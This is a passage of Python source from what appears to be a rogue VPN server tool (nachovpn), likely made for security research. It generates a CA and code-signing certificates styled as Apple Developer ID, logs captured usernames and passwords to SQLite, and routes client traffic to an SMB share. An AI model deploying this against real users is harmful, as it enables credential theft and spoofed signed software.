decipher_only=False,
key_cert_sign=False,
crl_sign=False
)
cert = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
self.ca_cert.subject
).public_key(
cert_key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.utcnow() - datetime.timedelta(days=1)
).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=365)
).add_extension(
x509.SubjectAlternativeName(san_list),
critical=False,
).add_extension(
x509.ExtendedKeyUsage(eku_list),
critical=True,
).add_extension(
key_usage,
critical=True,
).sign(self.ca_key, hashes.SHA256(), default_backend())
# Convert certificate and key to PEM format
cert_pem = cert.public_bytes(serialization.Encoding.PEM)
key_pem = cert_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
)
with open(cert_path, 'wb') as cert_file:
cert_file.write(cert_pem + self.ca_cert.public_bytes(serialization.Encoding.PEM))
with open(key_path, 'wb') as key_file:
key_file.write(key_pem)
return cert_path, key_path
def generate_ca_certificate(self):
self.ca_key_path = os.path.join(self.cert_dir, 'ca.key')
self.ca_cert_path = os.path.join(self.cert_dir, 'ca.crt')
# Check if CA cert already exists
if os.path.exists(self.ca_cert_path) and os.path.exists(self.ca_key_path):
logging.info("Loading existing CA certificate")
with open(self.ca_cert_path, 'rb') as f:
self.ca_cert = x509.load_pem_x509_certificate(f.read(), default_backend())
with open(self.ca_key_path, 'rb') as f:
self.ca_key = serialization.load_pem_private_key(f.read(), password=None, backend=default_backend())
return self.ca_key_path, self.ca_cert_path
logging.info("Generating new CA certificate")
# Generate CA private key
self.ca_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
# Build CA certificate
subject = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, self.ca_common_name),
#x509.NameAttribute(NameOID.ORGANIZATION_NAME, self.ca_common_name),
])
self.ca_cert = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
subject
).public_key(
self.ca_key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1)
).not_valid_after(
datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=3650)
).add_extension(
x509.BasicConstraints(ca=True, path_length=None),
critical=True
).add_extension(
x509.SubjectKeyIdentifier.from_public_key(self.ca_key.public_key()),
critical=False
).add_extension(
x509.AuthorityKeyIdentifier.from_issuer_public_key(self.ca_key.public_key()),
critical=False
).sign(self.ca_key, hashes.SHA256(), default_backend())
# Save CA cert and key
with open(self.ca_cert_path, 'wb') as f:
f.write(self.ca_cert.public_bytes(serialization.Encoding.PEM))
with open(self.ca_key_path, 'wb') as f:
f.write(self.ca_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
))
return self.ca_key_path, self.ca_cert_path
def generate_codesign_certificate(self, common_name, pfx_path=None, cert_path=None, key_path=None):
if not self.ca_cert or not self.ca_key:
self.load_ca_certificate()
if pfx_path is None:
pfx_path = os.path.join(self.cert_dir, 'codesign.pfx')
if cert_path is None:
cert_path = os.path.join(self.cert_dir, 'codesign.cer')
if key_path is None:
key_path = os.path.join(self.cert_dir, 'codesign.key')
if os.path.exists(cert_path) and os.path.exists(key_path) and \
os.path.exists(pfx_path) and self.cert_is_valid(cert_path, common_name):
logging.info(f"Loading existing codesigning certificate for: {common_name}")
return pfx_path
else:
logging.info(f"Generating new codesigning certificate for: {common_name}")
# Generate a private key for the code signing certificate
codesign_private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
# Create the code signing certificate
subject = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, common_name)
])
eku_list = [
ExtendedKeyUsageOID.CODE_SIGNING,
]
key_usage = x509.KeyUsage(
digital_signature=True,
key_encipherment=False,
content_commitment=False,
data_encipherment=False,
key_agreement=False,
encipher_only=False,
decipher_only=False,
key_cert_sign=False,
crl_sign=False
)
builder = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
self.ca_cert.subject
).public_key(
codesign_private_key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1)
).not_valid_after(
datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=365)
).add_extension(
x509.ExtendedKeyUsage(eku_list),
critical=True,
).add_extension(
key_usage,
critical=True,
)
# Sign the certificate with the CA private key
codesign_certificate = builder.sign(self.ca_key, hashes.SHA256(), default_backend())
# Save the new certificate to a file
with open(cert_path, 'wb') as f:
f.write(codesign_certificate.public_bytes(serialization.Encoding.PEM))
with open(key_path, 'wb') as f:
f.write(codesign_private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
))
# Convert to pkcs12 and save to codesign.pfx
logging.info(f"Saving codesigning certificate to {pfx_path}")
with open(pfx_path, "wb") as f:
f.write(serialization.pkcs12.serialize_key_and_certificates(
b"codesign",
codesign_private_key,
codesign_certificate,
None,
serialization.NoEncryption()
))
return pfx_path
def generate_apple_certificate(self, common_name="Developer ID Installer", cert_path=None, key_path=None):
"""Generate an Apple code signing certificate"""
if cert_path is None:
cert_path = os.path.join(self.cert_dir, 'apple.cer')
if key_path is None:
key_path = os.path.join(self.cert_dir, 'apple.key')
# Generate a private key
apple_private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
# Create Apple signing certificate
subject = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, common_name)
])
# list of EKUs
eku_list = [
ExtendedKeyUsageOID.CODE_SIGNING,
ObjectIdentifier("1.2.840.113635.100.6.1.14"), # Apple Developer ID Installer
ObjectIdentifier("1.2.840.113635.100.4.13"), # Apple Package Signing
ObjectIdentifier("1.2.840.113635.100.6.1.14"), # Apple Extension Signing
]
key_usage = x509.KeyUsage(
digital_signature=True,
key_encipherment=False,
content_commitment=False,
data_encipherment=False,
key_agreement=False,
encipher_only=False,
decipher_only=False,
key_cert_sign=False,
crl_sign=False
)
builder = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
self.ca_cert.subject
).public_key(
apple_private_key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.utcnow() - datetime.timedelta(days=1)
).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=365)
).add_extension(
x509.ExtendedKeyUsage(eku_list),
critical=True,
).add_extension(
key_usage,
critical=True,
)
# Sign the certificate with the CA private key
apple_certificate = builder.sign(self.ca_key, hashes.SHA256(), default_backend())
# Save the new certificate to a file
with open(cert_path, 'wb') as f:
f.write(apple_certificate.public_bytes(serialization.Encoding.PEM))
# Save the private key
with open(key_path, 'wb') as f:
f.write(apple_private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
))
return cert_path, key_path
================================================
FILE: src/nachovpn/core/db_manager.py
================================================
from datetime import datetime
import sqlite3
import logging
import json
import threading
class DBManager:
def __init__(self, db_path='database.db'):
self.db_path = db_path
self.conn = None
self.lock = threading.Lock()
self.setup_database()
def setup_database(self):
"""Initialize the database connection and create tables if they don't exist."""
try:
self.conn = sqlite3.connect(self.db_path, check_same_thread=False)
cursor = self.conn.cursor()
cursor.execute('''
CREATE TABLE IF NOT EXISTS credentials (
timestamp DATETIME DEFAULT CURRENT_TIMESTAMP,
username TEXT,
password TEXT,
other TEXT,
plugin TEXT
)
''')
self.conn.commit()
logging.info(f"Database initialized successfully at {self.db_path}")
except sqlite3.Error as e:
logging.error(f"Database initialization error: {e}")
raise
def log_credentials(self, username, password, plugin_name, other_data=None):
"""Log credentials using prepared statements."""
try:
with self.lock:
cursor = self.conn.cursor()
cursor.execute(
'INSERT INTO credentials (username, password, other, plugin) VALUES (?, ?, ?, ?)',
(username, password, json.dumps(other_data) if other_data else None, plugin_name)
)
self.conn.commit()
except sqlite3.Error as e:
logging.error(f"Error logging credentials: {e}")
def close(self):
"""Close the database connection."""
if self.conn:
with self.lock:
self.conn.close()
================================================
FILE: src/nachovpn/core/ip_manager.py
================================================
from __future__ import annotations
import ipaddress, itertools, threading, time, os
LEASE_SECS = int(os.getenv("LEASE_SECS", 5 * 60))
VPN_SUBNET = "10.10.0.0/16"
class IPPool:
"""Round-robin allocator with lease/idle-timeout."""
def __init__(self, cidr: str = VPN_SUBNET):
self.net = ipaddress.ip_network(cidr)
self.host_iter = itertools.cycle(self.net.hosts())
self.lock = threading.Lock()
# ip_str -> last_seen_epoch
self.inuse: dict[str, float] = {}
# Reserve gateway
gw = str(next(self.host_iter))
self.inuse[gw] = float('inf')
def alloc(self) -> str:
now = time.time()
with self.lock:
for _ in range(self.net.num_addresses - 2):
cand = str(next(self.host_iter))
last = self.inuse.get(cand, 0)
if now - last > LEASE_SECS:
self.inuse[cand] = now
return cand
raise RuntimeError("Address pool exhausted")
def touch(self, ip: str):
"""Call whenever we see traffic from ip to keep the lease alive."""
with self.lock:
if ip in self.inuse:
self.inuse[ip] = time.time()
def release(self, ip: str):
with self.lock:
self.inuse.pop(ip, None)
================================================
FILE: src/nachovpn/core/packet_handler.py
================================================
from pyroute2 import AsyncIPRoute
from dataclasses import dataclass, field
from nachovpn.core.ip_manager import IPPool
from scapy.layers.l2 import Ether
from scapy.packet import Raw
from scapy.utils import PcapWriter
import nftables
import asyncio
import os
import logging
import ipaddress
import socket
import time
import uuid
import struct
import fcntl
import threading
TUNNEL_MTU = int(os.getenv("TUNNEL_MTU", 1400))
LEASE_SECS = int(os.getenv("LEASE_SECS", 5 * 60)) # 5 minutes
LEASE_CLEANUP_INTERVAL = int(os.getenv("LEASE_CLEANUP_INTERVAL", 60)) # 1 minute
VPN_SUBNET = "10.10.0.0/16"
# Tunnel forwarding control
TUNNEL_PRIVATE = os.getenv("TUNNEL_PRIVATE", "false").lower() == "true"
TUNNEL_FULL = os.getenv("TUNNEL_FULL", "false").lower() == "true"
TUNNEL_ENABLED = (TUNNEL_PRIVATE or TUNNEL_FULL) and os.name != 'nt'
IFF_NO_PI = 0x1000
TUNSETIFF = 0x400454CA
IFF_TUN = 0x0001
@dataclass
class ClientInfo:
"""Information about a connected client"""
sock: socket.socket
ip_address: str
connection_id: str
callback: callable
last_seen: float = field(default_factory=time.time)
class PacketHandler:
"""
TUN-based packet handler using nftables
"""
def __init__(self, write_pcap=False, pcap_filename=None):
"""Initialize packet handler"""
self.logger = logging.getLogger(__name__)
self.write_pcap = write_pcap
self.pcap_filename = pcap_filename
self._pcap_writer = None
self.logger.debug(f"[TUN] PacketHandler instantiated in thread {threading.current_thread().name}")
# Initialize pyroute2 and nftables
self._ipr = AsyncIPRoute()
self.nft = nftables.Nftables()
# TUN interface name
self.tun_name = "nacho0"
# Client management
self.clients = {} # ip_address -> ClientInfo
self.conn_to_ip = {} # connection_id -> ip_address
self.ip_pool = IPPool(VPN_SUBNET)
self.client_lock = asyncio.Lock()
self.connection_states = {} # connection_id -> bool (True if connection is alive)
# Packet queuing
self.packet_queues = {} # connection_id -> asyncio.Queue
self.send_tasks = {} # connection_id -> asyncio.Task
# Cache TUN file descriptor
self.tun_fd = None
# Background tasks
self._lease_cleanup_task = None
self._closed = False
def _setup_nftables(self):
"""Configure nftables rules"""
try:
# First try to flush and delete existing table
try:
self.nft.cmd('flush table inet vpn')
self.nft.cmd('delete table inet vpn')
self.logger.info("Flushed existing nftables rules")
except Exception as e:
self.logger.warning(f"Error flushing existing rules: {e}")
# MSS clamp to TUNNEL_MTU
tcp_mss = TUNNEL_MTU
# Get the gateway IP (first host in the subnet)
subnet = ipaddress.ip_network(VPN_SUBNET)
gateway_ip = str(next(subnet.hosts()))
# Get addr / len from VPN_SUBNET
vpn_addr, vpn_len = VPN_SUBNET.split("/")
# Log the tunnel forwarding configuration
self.logger.info(f"Tunnel forwarding configuration: TUNNEL_PRIVATE={TUNNEL_PRIVATE}, TUNNEL_FULL={TUNNEL_FULL}")
# Build nftables rules
rules = [
{
"add": {
"table": {
"family": "inet",
"name": "vpn"
}
}
},
{
"add": {
"chain": {
"family": "inet",
"table": "vpn",
"name": "input",
"type": "filter",
"hook": "input",
"prio": 0,
"policy": "accept"
}
}
},
{
"add": {
"chain": {
"family": "inet",
"table": "vpn",
"name": "forward",
"type": "filter",
"hook": "forward",
"prio": 0,
"policy": "drop"
}
}
},
{
"add": {
"chain": {
"family": "inet",
"table": "vpn",
"name": "postroute",
"type": "nat",
"hook": "postrouting",
"prio": 100
}
}
},
{
"add": {
"chain": {
"family": "inet",
"table": "vpn",
"name": "preroute",
"type": "nat",
"hook": "prerouting",
"prio": -100
}
}
},
# Allow TCP 445 to gateway IP from VPN subnet
{
"add": {
"rule": {
"family": "inet",
"table": "vpn",
"chain": "input",
"expr": [
{"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
{"match": {"left": {"payload": {"protocol": "ip", "field": "saddr"}}, "op": "in", "right": {"prefix": {"addr": vpn_addr, "len": int(vpn_len)}}}},
{"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "==", "right": gateway_ip}},
{"match": {"left": {"payload": {"protocol": "tcp", "field": "dport"}}, "op": "==", "right": 445}},
{"accept": None}
]
}
}
},
# Default drop for all other VPN interface traffic
{
"add": {
"rule": {
"family": "inet",
"table": "vpn",
"chain": "input",
"expr": [
{"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
{"drop": None}
]
}
}
},
# Accept established/related
{
"add": {
"rule": {
"family": "inet",
"table": "vpn",
"chain": "forward",
"expr": [
{"match": {"left": {"ct": {"key": "state"}}, "op": "in", "right": {"set": ["established", "related"]}}},
{"accept": None}
]
}
}
},
# Drop traffic to the gateway IP
{
"add": {
"rule": {
"family": "inet",
"table": "vpn",
"chain": "forward",
"expr": [
{"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "==", "right": gateway_ip}},
{"drop": None}
]
}
}
}
]
# Add forwarding rules if TUNNEL_FULL is enabled
if TUNNEL_FULL:
self.logger.info("Adding internet forwarding rules - VPN clients can access the internet")
# Drop traffic to private/LAN ranges
rules.append({
"add": {
"rule": {
"family": "inet",
"table": "vpn",
"chain": "forward",
"expr": [
{"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "in", "right": {"set": [
{"prefix": {"addr": "10.0.0.0", "len": 8}},
{"prefix": {"addr": "127.0.0.0", "len": 8}},
{"prefix": {"addr": "169.254.169.254", "len": 32}},
{"prefix": {"addr": "172.16.0.0", "len": 12}},
{"prefix": {"addr": "192.168.0.0", "len": 16}}
]}}},
{"drop": None}
]
}
}
})
# Drop broadcast and multicast traffic
rules.append({
"add": {
"rule": {
"family": "inet",
"table": "vpn",
"chain": "forward",
"expr": [
{"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "in", "right": {"set": [
{"prefix": {"addr": "224.0.0.0", "len": 4}},
{"prefix": {"addr": "255.255.255.255", "len": 32}}
]}}},
{"drop": None}
]
}
}
})
# Accept all other VPN client traffic to the internet
rules.append({
"add": {
"rule": {
"family": "inet",
"table": "vpn",
"chain": "forward",
"expr": [
{"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
{"accept": None}
]
}
}
})
# Masquerade traffic from VPN subnet
rules.append({
"add": {
"rule": {
"family": "inet",
"table": "vpn",
"chain": "postroute",
"expr": [
{"match": {"left": {"payload": {"protocol": "ip", "field": "saddr"}}, "op": "in", "right": {"prefix": {"addr": vpn_addr, "len": int(vpn_len)}}}},
{"match": {"left": {"meta": {"key": "oifname"}}, "op": "!=", "right": self.tun_name}},
{"masquerade": None}
]
}
}
})
else:
self.logger.info("Internet forwarding disabled - VPN clients can only access SMB share")
cmd = {"nftables": rules}
# Apply nftables rules
rc, _, err = self.nft.json_cmd(cmd)
if rc:
raise RuntimeError(f"Failed to apply nftables rules: {err}")
self.logger.info("Configured nftables rules")
# Check if IP forwarding is enabled
try:
with open('/proc/sys/net/ipv4/ip_forward', 'r') as f:
ip_forward = f.read().strip()
if ip_forward != '1':
self.logger.error(f"IP forwarding is not enabled. Please enable it with: sudo sysctl -w net.ipv4.ip_forward=1")
self.logger.info("IP forwarding is enabled")
except FileNotFoundError:
self.logger.error("Cannot read IP forwarding status from /proc/sys/net/ipv4/ip_forward. Please ensure IP forwarding is enabled with: sudo sysctl -w net.ipv4.ip_forward=1")
# Add MSS clamping rules
try:
self.nft.cmd(f'add rule inet vpn forward iifname {self.tun_name} ip saddr 10.10.0.0/16 tcp flags syn tcp option maxseg size set {tcp_mss}')
self.nft.cmd(f'add rule inet vpn forward oifname {self.tun_name} ip daddr 10.10.0.0/16 tcp flags syn tcp option maxseg size set {tcp_mss}')
self.logger.info(f"Added TCP MSS clamping rules with MSS {tcp_mss}")
except Exception as e:
self.logger.error(f"Failed to add TCP MSS clamping rules: {e}")
raise
# Verify rules were applied
try:
result = self.nft.cmd('list ruleset')
self.logger.debug(f"Current nftables rules: {result}")
except Exception as e:
self.logger.error(f"Failed to list rules: {e}")
except Exception as e:
self.logger.error(f"Failed to configure nftables: {e}")
raise
async def _setup_tun_interface(self):
"""Create and configure the TUN interface"""
try:
idx = await self._ipr.link_lookup(ifname=self.tun_name)
if idx:
self.logger.info("Removing existing interface %s", self.tun_name)
await self._ipr.link("del", index=idx[0])
# Create TUN interface
await self._ipr.link(
"add",
ifname=self.tun_name,
kind="tuntap",
mode="tun",
iflags=IFF_TUN | IFF_NO_PI
)
# Get interface info
idx = (await self._ipr.link_lookup(ifname=self.tun_name))[0]
info = await self._ipr.link("get", index=idx)
self.logger.debug(f"[TUN] Interface created with flags: {info[0]['flags']}")
# Set MTU
await self._ipr.link("set", index=idx, mtu=TUNNEL_MTU, state="up")
self.logger.info(f"[TUN] Set interface MTU to {TUNNEL_MTU} bytes")
subnet = ipaddress.ip_network(VPN_SUBNET)
gateway_ip = str(next(subnet.hosts()))
await self._ipr.addr("add", index=idx, address=gateway_ip,
prefixlen=subnet.prefixlen)
self.logger.info("Created %s %s/%s",
self.tun_name, gateway_ip, subnet.prefixlen)
# Disable IPv6 on the nacho0 interface
ipv6_disable_path = f"/proc/sys/net/ipv6/conf/{self.tun_name}/disable_ipv6"
if os.path.exists(ipv6_disable_path):
try:
with open(ipv6_disable_path, "w") as f:
f.write("1\n")
self.logger.info(f"Disabled IPv6 on {self.tun_name}")
except Exception as e:
self.logger.warning(f"Failed to disable IPv6 on {self.tun_name}: {e}")
except Exception:
self.logger.exception("Failed to create TUN interface")
raise
def _setup_tun_fd(self) -> None:
"""Open /dev/net/tun and bind it to the nacho0 interface."""
try:
# Open the TUN character device
fd = os.open("/dev/net/tun", os.O_RDWR | os.O_NONBLOCK)
self.logger.debug(f"[TUN] Opened /dev/net/tun with fd={fd}")
# Tell the kernel which interface this fd belongs to
ifr = struct.pack(
"16sH",
self.tun_name.encode(),
IFF_TUN | IFF_NO_PI
)
self.logger.debug(f"[TUN] Setting interface flags: IFF_TUN={IFF_TUN}, IFF_NO_PI={IFF_NO_PI}")
fcntl.ioctl(fd, TUNSETIFF, ifr)
self.logger.debug(f"[TUN] Bound fd={fd} to interface {self.tun_name}")
# Store and register with the event loop
self.tun_fd = fd
self._loop.add_reader(fd, self._on_tun_ready)
self.logger.debug(f"[TUN] Registered fd={fd} with event loop")
except Exception as e:
self.logger.error(f"[TUN] Failed to open TUN file descriptor: {e}")
raise
def _on_tun_ready(self):
"""Synchronous callback when TUN fd is ready for reading"""
try:
self.logger.debug("[TUN] _on_tun_ready called")
# Read packet from TUN interface
packet_data = os.read(self.tun_fd, 65535)
if not packet_data:
self.logger.debug("[TUN] No data available")
return
self.logger.debug(f"[TUN] Raw packet data: {packet_data.hex()}")
# Get IP version
version = packet_data[0] >> 4
if version != 4:
self.logger.debug(f"[TUN] Ignoring non-IPv4 packet: version={version}, first_bytes={packet_data[:4].hex()}")
return
# IPv4 packet
if len(packet_data) >= 20:
dest_ip = socket.inet_ntoa(packet_data[16:20])
src_ip = socket.inet_ntoa(packet_data[12:16])
self.logger.debug(f"[TUN] IPv4 packet: src={src_ip} dst={dest_ip} len={len(packet_data)}")
if dest_ip:
self.logger.debug(f"[TUN] Handling reply packet for dest_ip={dest_ip}, src_ip={src_ip}, len={len(packet_data)}")
self._loop.create_task(self._handle_reply_packet(packet_data, dest_ip))
else:
self.logger.warning(f"[TUN] Packet too short for IPv4: len={len(packet_data)}")
except BlockingIOError:
# No data available
pass
except Exception as e:
self.logger.error(f"[TUN] Error reading from TUN interface: {e}")
async def _lease_cleanup(self):
"""Periodically check for and reclaim expired client leases"""
while True:
await asyncio.sleep(LEASE_CLEANUP_INTERVAL)
try:
async with self.client_lock:
now = time.time()
# Find stale clients
stale = [
ip for ip, client in self.clients.items()
if now - client.last_seen > LEASE_SECS
]
# Reclaim them
for ip in stale:
await self._reclaim_client(ip)
except Exception as e:
self.logger.error(f"Error in lease cleanup: {e}")
async def _reclaim_client(self, ip_address):
"""Reclaim a client's resources"""
try:
client = self.clients.pop(ip_address, None)
if client:
# Remove connection mapping
self.conn_to_ip.pop(client.connection_id, None)
# Close the socket
try:
if hasattr(client, 'sock'):
client.sock.close()
except Exception:
pass
# Release the IP
self.ip_pool.release(ip_address)
self.logger.info(f"Reclaimed idle client {client.connection_id} with IP {ip_address}")
except Exception as e:
self.logger.error(f"Error reclaiming client {ip_address}: {e}")
def _send_all_blocking(self, sock, data):
"""Send all bytes on a blocking socket."""
try:
sock.setblocking(True)
sock.sendall(data)
return True
except Exception as e:
self.logger.error(f"Error sending data (blocking): {e}")
return False
async def _send_packets(self, connection_id, queue):
"""Background task to send packets from queue to client"""
try:
while True:
# Get next packet from queue
packet_data = await queue.get()
if packet_data is None: # Shutdown signal
break
# Get client info
ip_address = self.conn_to_ip.get(connection_id)
if not ip_address:
self.logger.warning(f"[TUN] No IP address found for connection_id {connection_id} in _send_packets")
continue
client = self.clients.get(ip_address)
if not client:
self.logger.warning(f"[TUN] No client found for IP {ip_address} in _send_packets")
continue
# Check if connection is still alive
if not self.connection_states.get(connection_id, False):
self.logger.warning(f"[TUN] Connection {connection_id} is no longer alive in _send_packets")
continue
self.logger.debug(f"[TUN] Sending reply packet of size {len(packet_data)} bytes to client {connection_id} (IP {ip_address})")
try:
await self._loop.run_in_executor(
None,
self._send_all_blocking,
client.sock,
packet_data
)
except Exception as e:
self.logger.error(f"[TUN] Failed to send data to client {connection_id}: {e}")
self.connection_states[connection_id] = False
self.destroy_session(connection_id)
break
# Update client state under lock
async with self.client_lock:
if ip_address in self.clients:
self.clients[ip_address].last_seen = time.time()
# Touch the IP to keep lease alive
self.ip_pool.touch(ip_address)
self.logger.debug(f"[TUN] Updated client {connection_id} last_seen time")
# Mark task as done
queue.task_done()
except Exception as e:
self.logger.error(f"[TUN] Error in send_packets task for {connection_id}: {e}")
self.connection_states[connection_id] = False
self.destroy_session(connection_id)
def register_client(self, connection_id, sock, wrapper_callback):
"""Register a new client and assign an IP"""
try:
# Allocate IP from pool
ip_address = self.ip_pool.alloc()
# Store client info
self.clients[ip_address] = ClientInfo(
sock=sock,
ip_address=ip_address,
connection_id=connection_id,
callback=wrapper_callback,
last_seen=time.time()
)
# Add connection mapping
self.conn_to_ip[connection_id] = ip_address
# Mark connection as alive
self.connection_states[connection_id] = True
# Create packet queue and start send task
self.packet_queues[connection_id] = asyncio.Queue(maxsize=100)
self.send_tasks[connection_id] = self._loop.create_task(
self._send_packets(connection_id, self.packet_queues[connection_id])
)
self.logger.info(f"Registered client {connection_id} with IP {ip_address}")
return ip_address
except Exception as e:
self.logger.error(f"Failed to register client {connection_id}: {e}")
raise
def destroy_session(self, connection_id):
"""Unregister a client and release their IP"""
ip_address = self.conn_to_ip.get(connection_id)
if ip_address and ip_address in self.clients:
# Remove connection mapping
self.conn_to_ip.pop(connection_id, None)
# Remove client info
del self.clients[ip_address]
# Remove connection state
self.connection_states.pop(connection_id, None)
# Clean up packet queue and send task
queue = self.packet_queues.pop(connection_id, None)
if queue:
# Signal task to stop
self._loop.call_soon_threadsafe(queue.put_nowait, None)
task = self.send_tasks.pop(connection_id, None)
if task:
task.cancel()
# Release the IP
self.ip_pool.release(ip_address)
self.logger.info(f"Unregistered client {connection_id}")
async def _handle_reply_packet(self, packet_data, dest_ip):
"""Handle a reply packet from the TUN interface"""
try:
# Lookup client by IP
client = self.clients.get(dest_ip)
self.logger.debug(f"[TUN] Handling reply packet for dest_ip={dest_ip}, client={client}")
if client:
# Check if connection is still alive
if not self.connection_states.get(client.connection_id, False):
self.logger.warning(f"[TUN] Connection {client.connection_id} is no longer alive, skipping packet")
return
# Use the plugin's wrapper_callback
if client.callback:
self.logger.debug(f"[TUN] Using callback for client {client.connection_id}")
wrapped_data = client.callback(packet_data, client)
else:
self.logger.debug(f"[TUN] No callback for client {client.connection_id}, using raw data")
wrapped_data = packet_data
# Add packet to queue
self.logger.debug(f"[TUN] Queuing reply packet to client {client.connection_id} (IP {dest_ip}): original size={len(packet_data)}, wrapped size={len(wrapped_data)}")
queue = self.packet_queues.get(client.connection_id)
if queue:
try:
queue.put_nowait(wrapped_data)
self.logger.debug(f"[TUN] Queued reply packet to client {client.connection_id}")
except asyncio.QueueFull:
self.logger.warning(f"[TUN] Client {client.connection_id} queue full, dropping packet")
else:
self.logger.warning(f"[TUN] No queue found for client {client.connection_id}")
else:
self.logger.warning(f"[TUN] No client found for destination IP {dest_ip}")
except Exception as e:
self.logger.error(f"[TUN] Error handling reply packet: {e}")
def handle_client_packet(self, packet_data, connection_id):
"""Handle a packet from a client"""
try:
self.logger.debug(f"Handling client packet for connection_id {connection_id}")
ip_address = self.conn_to_ip.get(connection_id)
if not ip_address:
self.logger.error(f"No client found for connection_id {connection_id}")
return
client_info = self.clients.get(ip_address)
if not client_info:
self.logger.error(f"No ClientInfo found for IP {ip_address}")
return
src_ip = socket.inet_ntoa(packet_data[12:16]) if len(packet_data) >= 16 and (packet_data[0] >> 4) == 4 else None
dst_ip = socket.inet_ntoa(packet_data[16:20]) if len(packet_data) >= 20 and (packet_data[0] >> 4) == 4 else None
self.logger.debug(f"[Client] Packet: src={src_ip} dst={dst_ip} len={len(packet_data)}")
# Update last seen time
async def update_client():
async with self.client_lock:
if ip_address in self.clients:
self.clients[ip_address].last_seen = time.time()
self._loop.create_task(update_client())
if TUNNEL_ENABLED:
# Write packet to TUN interface
if self.tun_fd is not None:
try:
bytes_written = os.write(self.tun_fd, packet_data)
self.logger.debug(f"[TUN] Wrote {bytes_written} bytes to TUN interface")
except BlockingIOError:
# TUN queue is full, drop the packet
self.logger.warning("TUN queue full, dropping packet")
except Exception as e:
self.logger.error(f"Error writing to TUN interface: {e}")
self.logger.error("Stack trace:", exc_info=True)
else:
self.logger.error("TUN file descriptor not available")
else:
self.logger.debug(f"[TUN] Tunnel disabled. Received packet from {src_ip} to {dst_ip}")
self.append_to_pcap(packet_data)
except Exception as e:
self.logger.error(f"Error handling client packet: {e}")
def append_to_pcap(self, packet):
"""Append packet to PCAP file if enabled"""
try:
if self.write_pcap and self._pcap_writer is not None:
pkt = self._fake_eth / Raw(load=bytes(packet))
self._pcap_writer.write(pkt)
except Exception as e:
self.logger.error(f'Error appending to PCAP: {e}')
async def close(self):
"""Clean up resources"""
if self._closed:
return
try:
# Cancel background tasks
if TUNNEL_ENABLED and hasattr(self, '_lease_cleanup_task'):
self._lease_cleanup_task.cancel()
try:
await self._lease_cleanup_task
except asyncio.CancelledError:
pass
# Close all client connections
async with self.client_lock:
for client in list(self.clients.values()):
try:
if hasattr(client, 'sock'):
client.sock.close()
except Exception:
pass
self.clients.clear()
self.conn_to_ip.clear()
# Clean up tunneling resources
if TUNNEL_ENABLED:
# Remove TUN fd from event loop
if self.tun_fd is not None:
try:
self._loop.remove_reader(self.tun_fd)
self.logger.info("Removed TUN fd from event loop")
except Exception as e:
self.logger.error(f"Error removing TUN fd from event loop: {e}")
# Close TUN file descriptor
if self.tun_fd is not None:
try:
os.close(self.tun_fd)
self.logger.info("Closed TUN file descriptor")
except Exception as e:
self.logger.error(f"Error closing TUN file descriptor: {e}")
try:
self.nft.cmd('flush table inet vpn')
self.nft.cmd('delete table inet vpn')
self.logger.info("Cleaned up nftables rules")
except Exception as e:
self.logger.error(f"Error cleaning up nftables: {e}")
# Close IPRoute
if hasattr(self, '_ipr'):
try:
await self._ipr.close()
self.logger.info("Closed IPRoute")
except Exception as e:
self.logger.error(f"Error closing IPRoute: {e}")
# Close PCAP writer
if self._pcap_writer is not None:
try:
self._pcap_writer.close()
self.logger.info("Closed PCAP writer")
except Exception as e:
self.logger.error(f"Error closing PCAP writer: {e}")
self._closed = True
self.logger.info("PacketHandler closed successfully")
except Exception as e:
self.logger.error(f"Error in cleanup: {e}")
raise
def create_session(self, sock, wrapper_callback):
"""Create a new session: generate connection_id, assign IP, and register client."""
connection_id = str(uuid.uuid4())
ip_address = self.register_client(connection_id, sock, wrapper_callback)
return connection_id, ip_address
def get_assigned_ip(self, connection_id):
"""Return the assigned IP for a given connection_id, or None if not found."""
return self.conn_to_ip.get(connection_id)
def assign_socket(self, connection_id, sock):
"""Assign or update the socket for an existing client session."""
ip_address = self.conn_to_ip.get(connection_id)
if ip_address and ip_address in self.clients:
self.logger.info(f"Assigning new socket to connection_id {connection_id} (IP {ip_address})")
self.clients[ip_address].sock = sock
return True
self.logger.warning(f"assign_socket: No client found for connection_id {connection_id}")
return False
async def start(self):
"""Start the packet handler's background tasks"""
try:
